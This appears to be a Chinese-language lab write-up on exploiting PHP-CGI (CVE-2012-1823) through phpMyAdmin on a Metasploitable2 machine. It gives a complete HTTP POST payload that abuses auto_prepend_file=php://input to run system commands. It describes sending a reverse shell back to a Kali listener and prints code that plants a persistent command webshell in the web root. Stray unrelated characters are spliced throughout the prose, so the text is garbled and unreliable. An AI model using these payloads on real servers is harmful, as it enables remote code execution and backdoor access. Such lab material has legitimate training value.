1痹届、phpMyAdmin/setup
在metasploit2中,可以測(cè)試其漏洞别智,由于其mysql是由phpMyAdmin來(lái)管理,因此直接訪問(wèn),可以看到
1.1爽室、php根據(jù)版本直接執(zhí)行調(diào)用系統(tǒng)命令
通過(guò)使用-d指定auto_prepend_file來(lái)制造任意文件包含漏洞,執(zhí)行任意代碼:
POST /phpMyAdmin/?-d+allow_url_include%3dOn+-d
+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 192.168.1.102 //要訪問(wèn)的服務(wù)IP地址
<?php
passthru('id'); //或者是passthru等系統(tǒng)執(zhí)行命令
die();
?>
如果是一段執(zhí)行木馬淆攻,可以直接再后臺(tái)運(yùn)行阔墩,舉例:將“abcdefghigk”寫入到新建的a.php文件中,并查看
1.2瓶珊、PHP反彈shell
在kali自帶一些php的木馬啸箫,可以拿來(lái)直接使用/usr/share/webshells/php/php-reverse-shell.php。復(fù)制此文件到桌面為2.php伞芹,然后編輯此文件忘苛,修改其中的參數(shù)蝉娜,其中IP為kali即反彈到的IP地址
修改IP地址和端口
將整個(gè)2.php文本復(fù)制到request請(qǐng)求中,而不是往目標(biāo)服務(wù)器寫入一個(gè)文件
在kali上開啟監(jiān)聽端口
在repeater上執(zhí)行g(shù)o
查看結(jié)果
而作為ifconfig等命令并不能夠執(zhí)行扎唾,因?yàn)槭怯脩羰莣ww-data召川,ifconfig不一定能夠執(zhí)行,該如何處理胸遇?
1.3荧呐、webshell(靜態(tài)shell)
在上述的php程序中換成如下內(nèi)容,此內(nèi)容可以理解成木馬文件纸镊,寫入到1.php倍阐,然后在http訪問(wèn)此文件即能夠執(zhí)行命令。
<?php
system('echo "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" > /var/www/1.php')
die();
?>
訪問(wèn)http://192.168.1.102并將cmd=id(或其他命令)查看結(jié)果逗威,可直接執(zhí)行峰搪。
[PHP-CGI遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2012-1823)分析參考鏈接]https://www.leavesongs.com/PENETRATION/php-cgi-cve-2012-1823.html
2、PHP5-CGI
采用默認(rèn)安裝PHP5-CGI時(shí)凯旭,/cgi-bin/php5 和 /cgi-bin/php由于不在/var/www(網(wǎng)站目錄)下概耻,因此爬網(wǎng)是爬不出來(lái)的,但是是能夠直接訪問(wèn)的尽纽,通過(guò)構(gòu)造php程序可以執(zhí)行執(zhí)行咐蚯。
